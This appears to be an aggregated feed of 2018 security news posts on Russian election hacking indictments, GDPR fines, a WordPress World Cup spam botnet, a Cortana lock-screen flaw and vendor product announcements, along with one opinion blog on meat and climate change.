A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might request the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he may request the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton’s presidential campaign, and his reply was clear:

“Well, I might,” Trump said.

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, and added that Russian hackers had also targeted his Republican Party.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed,” CNN reported.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempted hacking of “old emails” of the Republican National Committee was first reported by CNN in January last year, quoting the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Pierluigi Paganini

(Security Affairs – Trump-Putin meeting, hacking)

The post Trump might ask Putin to extradite the 12 Russian intelligence officers appeared first on Security Affairs.

Meat is Murder on the Environment

After decades of seeing activists lay out the obvious economics of meat, and reading research by economists confirming the obvious, it looks as if the market finally is shifting. Eating meat is by far the number one contributor to climate change, and executives are starting to execute on the meatless menu.

It always has seemed weird to me that if you wanted to remove meat from your work meals, or airplane meals for that matter, you had to check a special box. Really it should be the other way around. If someone wants to add meat, let them be the “special” case.

please check box if you want a major global catastrophic impact from your meal

It makes little to no sense to have meat as the default; people should have to actively choose to accelerate global destruction rather than have it served up mindlessly. Not saying I would never check the box, or that there would never be a need for meat, just that I would always want the default to be meatless. When I say make it rare I mean it both ways. The economics of why are obvious, as I will probably say continuously and forever.

For example, years ago I was running the “Global Calculator” created for economic modeling, and reducing meat consumption undeniably had more impact than any other factor.

The Global Calculator is a model of the world’s energy, land and food systems to 2050. It allows you to explore the world’s options for tackling climate change and see how they all add up. With the Calculator, you can find out whether everyone can have a good lifestyle while also tackling climate change.

A sad and ironic side note here is the fact that meat consumption is the top factor in the “extinction crisis”, as 3/4 of earth’s animal population is disappearing at an alarming rate. The top drivers of that crisis:

  1. climate change
  2. agriculture
  3. poaching
  4. pollution
  5. disease

I think it still may be counter-intuitive for a lot of folks that they should stop eating meat to reduce climate change to prevent extinction of animals. So if you really like meat you should stop eating it. Get it?

Thus a logical approach to solving many of the expensive problems people face today and into the future is to limit meat consumption within commercial spaces, because that is where expansive top-down decisions are easily made.

Imagine Google removing meat from its school-lunch-like program for its school-campus-like facilities for its school-children-like staff running its school-peer-review-like search engine. Alas, that probably means executive leadership (less like kids trying to stay in school forever) where someone issues a simple order to take a stand.

The first step on this path really should be Mar-a-Lago converts to vegan-only menus and becomes a research center for climate change, but I digress…

Instead it looks like WeWork has apparently woken up, and removed meat from its menus.

…told its 6,000 global staff that they will no longer be able to expense meals including meat, and that it won’t pay for any red meat, poultry or pork at WeWork events. In an email to employees this week outlining the new policy, co-founder Miguel McKelvey said the firm’s upcoming internal “Summer Camp” retreat would offer no meat options for attendees.

“New research indicates that avoiding meat is one of the biggest things an individual can do to reduce their personal environmental impact,” said McKelvey in the memo, “even more than switching to a hybrid car.”

It’s crazy to me that someone is calling out new research here when there is so much legacy work, but I guess that covers the question why they waited so long to do the right thing.

And just in case any of the typical extremist right-wing tech professionals (Shout out to the 303!) read this blog post, I offer this tasty morsel on vaccinating the mind against climate change falsehoods:

To find the most compelling climate change falsehood currently influencing public opinion, van der Linden and colleagues tested popular statements from corners of the internet on a nationally representative sample of US citizens, with each one rated for familiarity and persuasiveness.

The winner: the assertion that there is no consensus among scientists, apparently supported by the Oregon Global Warming Petition Project. This website claims to hold a petition signed by “over 31,000 American scientists” stating there is no evidence that human CO2 release will cause climate change.

The study also used the accurate statement that “97% of scientists agree on manmade climate change”. Prior work by van der Linden has shown this fact about scientific consensus is an effective ‘gateway’ for public acceptance of climate change.

Bring out the facts! Security professionals often ignore climate change harm and need facts as a gateway to accepting climate change risks. Maybe a good time to impact self-proclaimed security elites could be when they head to Las Vegas this summer…observe them carelessly gorging themselves on meat while claiming to care about data and risk, and hand them an invite to an exclusive WeWork party.

12 Russian Intel Officers charged of hacking into U.S. Democrats

The week closes with the indictment of twelve Russian intelligence officers by a US grand jury. The charges were filed just three days before President Donald Trump is scheduled to meet with Vladimir Putin.

The special counsel Robert Mueller, who on February 13 indicted Russians for a massive operation aimed at influencing the 2016 Presidential election, has now charged 12 Russian intelligence officers working for the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“There’s no allegation in this indictment that any American citizen committed a crime,” said Rosenstein. “The conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

He added, however, that “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers.”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence officers set up servers in the U.S. and Malaysia under fake names to run their operations, paying with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,” 

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The Democratic minority in the US government is pressing Trump to cancel the meeting with Putin, arguing that Putin intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections.”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,” 

Trump evidently believes that hostility toward Russia severely hampers the relationship and collaboration between the two states.

Russia denies any involvement in the elections; relations were already strained after Washington expelled 60 Russian intelligence officers from the Russian embassy in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, at least one person close to the Trump campaign and a candidate for Congress were in contact with the Russian officers.

Pierluigi Paganini

(Security Affairs – Russian Intelligence, Presidential election)

The post 12 Russian Intel Officers charged of hacking into U.S. Democrats appeared first on Security Affairs.

Chrome users get Site Isolation by default to ward off Spectre attacks

Site Isolation, the optional security feature added to Chrome 63 late last year to serve as protection against Spectre information disclosure attacks, has been enabled by default for all desktop Chrome users who upgraded to Chrome 67. How does Site Isolation mitigate the risk of Spectre attacks? “In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. …”

The post Chrome users get Site Isolation by default to ward off Spectre attacks appeared first on Help Net Security.

Zero-Day Coverage Update – Week of July 9, 2018

Earlier this week, I wrote a blog covering a couple of the statistics from the Zero Day Initiative’s (ZDI) first half of 2018. One of the stats that I didn’t cover is the increasing focus on enterprise applications. The team is seeing consistent growth in submissions of Microsoft and Apple vulnerabilities, but now they’re also seeing an increase of submissions in virtualization software vulnerabilities from the likes of VMware and Oracle. With a 33% increase in published advisories compared to 2017, the ZDI has their hands full. With more than 500 new researchers registering to participate in the program this year, the internal ZDI team is growing as well to accommodate this growth. 2018 may just be the biggest year yet for ZDI!

In case you missed it, you can read Brian Gorenc’s blog covering the detailed stats from the ZDI’s first half of 2018.

Microsoft Security Updates

This week’s Digital Vaccine® (DV) package includes coverage for Microsoft updates released on or before July 10, 2018. It was another big month for Microsoft with 53 security patches covering both browsers (Internet Explorer, Edge), ChakraCore, Windows, .NET Framework, ASP.NET, PowerShell, Visual Studio, and Microsoft Office and Office Services. Of these 53 CVEs, 18 are listed as Critical, 33 are rated Important, one is rated as Moderate, and one is rated as Low in severity.

Five CVEs in this month’s Microsoft update came through the Zero Day Initiative.

The following table maps Digital Vaccine filters to Microsoft’s updates. You can get more detailed information on this month’s security updates from Dustin Childs’ July 2018 Security Update Review from the Zero Day Initiative:

CVE # Digital Vaccine Filter # Status
CVE-2018-0949 32494
CVE-2018-8125 32486
CVE-2018-8171 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8172 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8202 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8206 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8222 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8232 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8238 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8242 32487
CVE-2018-8260 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8262 32491
CVE-2018-8274 32492
CVE-2018-8275 32493
CVE-2018-8276 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8278 32358
CVE-2018-8279 32359
CVE-2018-8280 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8281 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8282 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8283 32361
CVE-2018-8284 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8286 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8287 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8288 32488
CVE-2018-8289 32490
CVE-2018-8290 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8291 32360
CVE-2018-8294 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8296 32478
CVE-2018-8297 32551
CVE-2018-8298 32479
CVE-2018-8299 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8300 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8301 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8304 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8305 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8306 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8307 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8308 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8309 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8310 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8311 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8312 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8313 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8314 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8319 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8323 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8324 32558
CVE-2018-8325 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8326 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8327 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8356 Vendor Deemed Reproducibility or Exploitation Unlikely

 

Zero-Day Filters

There is one new zero-day filter covering one vendor in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

Advantech (1)

  • 32341: RPC: Advantech Webaccess webvrpcs Directory Traversal Vulnerability (ZDI-18-024)

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.

The post Zero-Day Coverage Update – Week of July 9, 2018 appeared first on .

GDPR takes its first victims

In the weeks leading up to the deadline for GDPR’s obligatory implementation, complaints to the leading data protection agencies in Europe about breaches of the new regulation piled up; and it hasn’t taken long for the reactions, and of course the sanctions, to appear. Facebook, which has been under scrutiny for months now, has received the first large sanction for not following the data processing standards found in the legislation.

And the fact is that two months after the GDPR came into force, data protection is still causing real headaches in many companies, both in Europe and further afield. Not only have we seen cases of intentional theft of data, but we’ve also seen cases where data has been lost due to internal cybersecurity carelessness.

And now we know the consequences of one of the cases of personal data abuse that has generated most interest among the public in the last few months: Facebook and Cambridge Analytica. A controversy that affected over 87 million users whose personal information was collected by the consulting firm without their express consent, and then sold to third parties, who supposedly used it to benefit Donald Trump’s presidential campaign.

Now, the Information Commissioner’s Office (ICO) in the UK has given Facebook a fine, the first the social network has received in relation to this scandal.  The £500,000 (€564,951.15) fine is the maximum stipulated by the country’s data protection laws.  This amount is probably not enough to make a dent in Facebook’s finances: the company is able to earn the same amount every five and a half minutes.

The ICO ruled that Facebook failed to safeguard its users’ data, and that it failed to be transparent about how it used this data or the interests that lay behind this abuse. The ICO will also bring criminal action against SCL Elections, Cambridge Analytica’s parent company.

So what has been the outcome of all this? The social network must pay the fine, although it is undoubtedly minimal in comparison with the magnitude of the scandal. It’s worth remembering that the GDPR can impose fines of up to 4% of a company’s annual turnover. This means that, had the case been judged within the framework of the European Union’s GDPR, Facebook could have faced a fine of €1,581,863,215, significantly higher than the one imposed by the UK.
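To make the 4% ceiling concrete, here is a quick back-of-the-envelope sketch. The turnover figure is inferred from the article’s own number, not taken from Facebook’s accounts, so treat it purely as an illustration of how the cap works:

```python
# The GDPR caps fines at 4% of global annual turnover, so the quoted
# maximum fine implies the turnover the calculation was based on
# (an assumption for illustration, not an official computation).
max_fine_eur = 1_581_863_215
implied_turnover_eur = max_fine_eur * 25  # dividing by 4% = multiplying by 25
print(implied_turnover_eur)  # 39546580375, i.e. roughly EUR 39.5bn turnover
```

Set against that, the £500,000 actually imposed is the statutory ceiling of the UK’s pre-GDPR regime, which is what makes the gap between the two figures so striking.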

This is not an isolated case

While the Facebook controversy is making headlines, there are many other cases of abuse of data that have come to light in the last few months.

In September 2017, Equifax was implicated in one of the largest data breaches in history, when the personal data of over 142 million people was leaked. Had the company received the highest sanction possible under the GDPR, Equifax would have faced an astronomical fine of 124 million dollars.

An even bigger case in terms of the amount of data affected was Exactis, a US marketing company. At the end of June, a database with 340 million individual records containing personal data was left exposed on the Internet without authentication.  This means that anyone could have accessed the database and its content.

Timehop was involved in another significant breach that exposed the data of 21 million users on July 4. The hacker that stole the data was able to gain access thanks to a cloud storage account that didn’t use multi-factor authentication. The company has stated that it contacted data protection officials shortly after the discovery of the breach.

It is clear that the economic sanctions that the GDPR entails are no trifling matter, and that, despite the increased interest in the subject of data protection, the problems surrounding the handling of personal information (PII) aren’t going to go away overnight.  But…

How can you avoid getting on the wrong side of GDPR?

If you’re worried about your company’s IT security, you’ll be interested to find out about Panda Adaptive Defense, the advanced cybersecurity suite that incorporates Endpoint Protection (EPP) and Endpoint Detection and Response (EDR) solutions with 100% Attestation and Threat Hunting & Investigation services. The combination of these solutions and services provides a detailed overview of all activities on every endpoint, total control of running processes, and a reduced attack surface.

Panda Adaptive Defense has modules created specifically to stop access, modification and exfiltration of both internal and external information. This is because Panda Data Control is able to discover, audit and monitor unstructured personal data on endpoints: from data at rest, to data in use and data in motion.

It stops uncontrolled access to your company’s sensitive data and helps you to comply with the new data protection rules found in the GDPR.

The post GDPR takes its first victims appeared first on Panda Security Mediacenter.

Microsoft is working on ‘next-generation’ security OS, hints Synaptics

Synaptics hints that Microsoft’s next-generation operating system will have enhanced biometric features

It’s been three years since Microsoft introduced its last desktop operating system, Windows 10, in July 2015. The tech giant has since been regularly upgrading, improving and developing the current operating system (OS) with a continuous stream of feature updates.

However, a recently released press note from Synaptics, the leading developer of human interface solutions, mentions “a next-generation operating system” from Microsoft with a focus on biometric security and Windows Hello. In other words, it hints that Microsoft is likely working on a next-generation OS secured by biometrics.

The press release notes titled “Synaptics, AMD Collaborate on Enterprise-Grade Biometric PC Security for Next-Generation Microsoft Operating System” announced “a joint initiative centered on delivering a new industry benchmark in highly-secure biometric fingerprint authentication for enterprise/commercial and consumer notebook PCs based on next-generation AMD Ryzen™ Mobile platform and Microsoft’s next-generation operating system.”

It further states, “The collaboration brings a new level of security for AMD-based laptops by leveraging Synaptics’ unique FS7600 Match-in-Sensor™ fingerprint sensor technology with powerful AMD Ryzen Mobile processors, and Microsoft’s forthcoming biometric security OS including Windows Hello.”

One can conclude from the announcement that the technology will also be based on AMD’s Ryzen Mobile platforms and a new operating system from Microsoft. However, the press release leaves many questions unanswered, as Microsoft itself hasn’t announced any upcoming releases.

However, it could be a reference to Microsoft’s rumored project called Polaris (a portable, lighter, simpler version of Windows 10 targeted at desktop PCs), or to Windows Core OS, another rumored modular version of Windows 10 for IoT (Internet of Things) smart devices, rather than a completely new operating system.

You can check out the full press release here.

Microsoft’s partner conference, Inspire, is expected to be held from July 15th to 19th in Las Vegas, Nevada, at the Mandalay Bay Convention Center and T-Mobile Arena. We can expect to hear more from Microsoft at this event, so keep watching this space for more updates!

The post Microsoft is working on ‘next-generation’ security OS, hints Synaptics appeared first on TechWorm.

Spambot targets WordPress sites in World Cup-themed spam scam

Imperva observed a spambot targeting WordPress sites aimed at tricking victims into clicking on links to sites offering betting services on FIFA World Cup

Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites; the attackers aimed to trick victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.

Imperva monitored the activity of a botnet used to spread meaningless text messages, generated from a template, to the comments sections of blogs, news articles, and other websites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published by Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately, without regard for whether the site has a comments section or is affected by known exploitable issues.

The comments are generated from a template that has been known since at least 2013. The template makes it possible to automatically create slightly different versions of the same message for use in spam campaigns.
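Templates of this kind typically use the “spintax” convention, where each {option1|option2} group is replaced by one randomly chosen alternative. The template and wording below are hypothetical, purely to illustrate how one template yields many near-identical comments; the botnet’s actual template is not reproduced here:

```python
import random

# Hypothetical spintax-style template (not the botnet's real one).
TEMPLATE = "{Great|Nice|Awesome} {post|article}, check out {this|my} site"

def spin(template: str, rng: random.Random) -> str:
    """Replace each {a|b|c} group with one randomly chosen alternative."""
    out = template
    while "{" in out:
        start = out.index("{")
        end = out.index("}", start)
        out = out[:start] + rng.choice(out[start + 1:end].split("|")) + out[end + 1:]
    return out

print(spin(TEMPLATE, random.Random(1)))
```

Because every generated comment differs slightly, naive exact-match filters miss most of them, which is part of why this template has survived since 2013.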

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.


“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small: it is composed of just 1,200 unique IPs, with up to 700 daily unique IPs. The researchers also found that the botnet has been using URL-shortening, URL redirection, and other techniques to mask the landing sites of the links advertised in its spam messages.
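Unwinding those masked links is a matter of following the redirect chain hop by hop until it stops moving. The URLs and the mapping below are made up for illustration; in practice each hop would come from the HTTP Location headers observed while crawling the advertised links:

```python
# Illustrative redirect chain: shortener -> redirector -> landing page.
REDIRECTS = {
    "https://short.example/abc": "https://redir.example/go?x=1",
    "https://redir.example/go?x=1": "https://betting.example/",
}

def final_destination(url: str, max_hops: int = 10) -> str:
    """Follow known redirects until a URL no longer redirects."""
    for _ in range(max_hops):
        if url not in REDIRECTS:
            return url
        url = REDIRECTS[url]
    raise RuntimeError("too many hops; possible redirect loop")

print(final_destination("https://short.example/abc"))  # https://betting.example/
```

Capping the hop count matters: spam infrastructure sometimes loops redirects deliberately to frustrate automated analysis.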

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-SPAM attacks on WordPress sites.


Just after the beginning of the 2018 World Cup, the botnet’s activity shifted to comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape; the most common countermeasure is to blacklist the IPs originating spam messages, as well as the URLs they advertise.
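The blacklisting countermeasure boils down to two checks before a comment is accepted. A minimal sketch, with placeholder IPs and URLs rather than real spam sources:

```python
# Illustrative blocklists (placeholder values, not real spam sources).
BLOCKED_IPS = {"203.0.113.7", "198.51.100.22"}
BLOCKED_URLS = {"https://betting.example/"}

def allow_comment(source_ip: str, links_in_comment: list) -> bool:
    """Reject a comment from a known spam IP or advertising a known spam URL."""
    if source_ip in BLOCKED_IPS:
        return False
    return not any(url in BLOCKED_URLS for url in links_in_comment)
```

Note the limitation the Imperva numbers expose: with 1,200 unique IPs and over 1,000 advertised URLs hidden behind shorteners, static lists lag behind the botnet, which is why dedicated anti-spam plug-ins and WAF services layer content analysis on top.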

WordPress also has several plug-ins that can defeat this kind of activity.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.

Pierluigi Paganini

(Security Affairs – spambot, World Cup spam)

The post Spambot targets WordPress sites in World Cup-themed spam scam appeared first on Security Affairs.

Kaspersky Report: $10 Million in Ether Stolen Through Phishing Last Year

A new report from Kaspersky Lab claims that cybercriminals are turning to cryptocurrency as a domain for scams and frauds. The schemes target ICO investors, who are perhaps vulnerable as they are seeking to invest money to begin with. “Kaspersky Lab experts have exposed a relatively new fraudulent trend: the development of cryptocurrency is not only attracting investors, but also cyber-criminals seeking to boost their profits,” reads the report.

View Full Story

ORIGINAL SOURCE: Unhashed

The post Kaspersky Report: $10 Million in Ether Stolen Through Phishing Last Year appeared first on IT SECURITY GURU.

WordPress Sites Targeted in World Cup-Themed Spam Scam

Spammers are using a ‘spray & pray’ approach to post comments on WordPress-powered blogs and forums, says Imperva. WordPress-powered websites are being targeted in a comment spam campaign designed to get users to click on links to sites offering betting services on the 2018 FIFA World Cup games.

View Full Story

ORIGINAL SOURCE: Dark Reading

The post WordPress Sites Targeted in World Cup-Themed Spam Scam appeared first on IT SECURITY GURU.

‘Data is a fingerprint’: why you aren’t as anonymous as you think online

In August 2016, the Australian government released an “anonymised” data set comprising the medical billing records, including every prescription and surgery, of 2.9 million people.

View Full Story

ORIGINAL SOURCE: The Guardian

The post ‘Data is a fingerprint’: why you aren’t as anonymous as you think online appeared first on IT SECURITY GURU.

Windows Malware Carries Valid Digital Signatures

Researchers from Masaryk University in the Czech Republic and Maryland Cybersecurity Center (MCC) monitored suspicious organizations and identified four that sold Microsoft Authenticode certificates to anonymous buyers. The same research team also collected a trove of Windows-targeted malware carrying valid digital signatures.

View Full Story

ORIGINAL SOURCE: Infosecurity Magazine

The post Windows Malware Carries Valid Digital Signatures appeared first on IT SECURITY GURU.

Ukraine Says It Stopped a VPNFilter Attack on a Chlorine Distillation Station

The Ukrainian Secret Service (SBU) said today it stopped a cyber-attack with the VPNFilter malware on a chlorine distillation plant in the village of Aulska, in the Dnipropetrovsk region.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Ukraine Says It Stopped a VPNFilter Attack on a Chlorine Distillation Station appeared first on IT SECURITY GURU.

Cylance Unveils “Cylance Smart Antivirus;” AI-Powered Antivirus for Consumers

Cylance Inc., the leading provider of AI-driven, prevention-first security solutions, today launched Cylance Smart Antivirus, AI-powered antivirus software designed specifically for consumers. By extending the enterprise-grade AI of CylancePROTECT into the home, Cylance provides internet users with next-generation security software that proactively predicts and blocks never-before-seen threats.

More than 350,000 new pieces of malware are created every day, and traditional consumer antivirus software simply can’t keep pace with today’s security reality. Existing solutions rely on reactive, signature-based technologies that slow down systems, bombard users with pop-up notifications, and require some form of breach in order to begin detecting malware. The exponential growth of malicious code, especially zero-day threats and ransomware, requires more innovative and thoughtful solutions to adequately—and effectively—protect end-users.

To help consumers stay ahead of bad actors, Cylance Smart Antivirus provides predictive security to spot and block threats before they have a chance to run without affecting device performance or disrupting the user.

“Consumers deserve security software that is fast, easy to use, and effective,” said Christopher Bray, senior vice president, Cylance Consumer. “The consumer antivirus market is long overdue for a groundbreaking solution built on robust technology that allows them to control their security environment.”

With Cylance Smart Antivirus, everyday internet users now have the option to purchase next-generation software built on artificial intelligence. Many people have experience with legacy products that are only as good as their last update. Such tools require extensive manual interactions such as downloads, installations, reboots, and scans. Cylance Smart Antivirus is a game-changer by offering an easy set-it-and-forget-it security experience that gives consumers true peace of mind and ease of use. Key features include:

  • Predictive threat prevention: With its AI-driven approach, Cylance Smart Antivirus is designed to proactively stop malicious threats, including complex malware variants.
  • Minimal impact on performance: Cylance Smart Antivirus runs silently and constantly without noticeable degradation of device performance, diminishing the constant pop-ups, scan requests, and bloatware features that characterize existing AV solutions.
  • Effortless user experience: Easy to install and manage, Cylance Smart Antivirus automatically updates in the background for a set-it-and-forget-it security experience. Users can get up and running in minutes, without unnecessary updates or reboots.
  • Visibility: Cylance Smart Antivirus empowers the technical expert in any family with full awareness and control of the security status of all devices regardless of device location. An easy-to-use web dashboard lets users set alerts if an attack has been blocked, monitor the status of protected devices, and view lists of malicious files blocked on each device.
  • Simple pricing: Cylance Smart Antivirus offers fair and transparent pricing. Unlike many vendors that steeply discount the first year of usage only to surprise consumers with auto-renewals at much higher rates, Cylance discounts subsequent years of use to encourage and reward long-term security hygiene.

The post Cylance Unveils “Cylance Smart Antivirus;” AI-Powered Antivirus for Consumers appeared first on IT SECURITY GURU.

Cortana security flaw means your PC may be compromised

Voice activated personal assistants are supposed to make our lives easier, which is why tech companies are building them into everything. Amazon’s range of smart speakers come pre-installed with Alexa, while smartphones ship with Siri, Google Now or Cortana depending on the manufacturer.

You can even find digital assistants built into your home computer now too. Ever since Windows 10 was released, PC users have been able to issue voice commands via Cortana just like they do using their phones.

Researchers uncover a new bug

Cybersecurity experts and hackers are constantly trying to find gaps and flaws that allow them to break into computers. And because Cortana is relatively new, the virtual assistant has come under intense scrutiny.

Sure enough, a flaw has been discovered that allows hackers to break into a Windows 10 PC using Cortana voice commands – even when it is locked. The problem is that Cortana is always listening. Although this is meant to make your life easier, it means that anyone can issue voice commands to the computer.

Normally it would be impossible to install malware or hack the computer while it is locked. But Cortana circumvents the usual safeguards, allowing a hacker to execute the commands that will install malware.

Don’t panic just yet

Cortana cannot be forced into downloading malware from the Internet or other computers – but it can be used to run scripts and other executables from a USB drive. This is good and bad news. Bad because Cortana can be tricked into installing malware, good because it can only be done with physical access to your computer.

If you can keep hackers out of your house, they won’t be able to access your computer. There is also no proof that the Cortana bug has been exploited by hackers yet.

Protect yourself

Just because the chances of falling victim to this particular hacking technique are slim doesn’t mean you shouldn’t take steps to protect yourself. First, you must disable Cortana on the lock screen – you can find a complete guide here. Note that Cortana will still function normally once your computer is unlocked.

Next, you must install a reliable antivirus suite like Panda Dome. Panda Dome will detect malware and viruses automatically and prevent them being installed – by Cortana or any other method.

Finally, you must update Windows 10 regularly to patch these vulnerabilities as quickly as possible. Microsoft has already released an update to address the Cortana flaw. You can download the patch directly from Microsoft Security TechCenter, or use Windows Update to fix this and other issues automatically.

With the patch applied, you can decide whether to re-enable Cortana on the lock screen or not.

Don’t wait

Every security risk needs to be fixed as soon as possible. Use the instructions above to bring your PC security up to standard – and don’t forget to download your free trial of Panda Dome either. You can learn more here.

Download your Antivirus

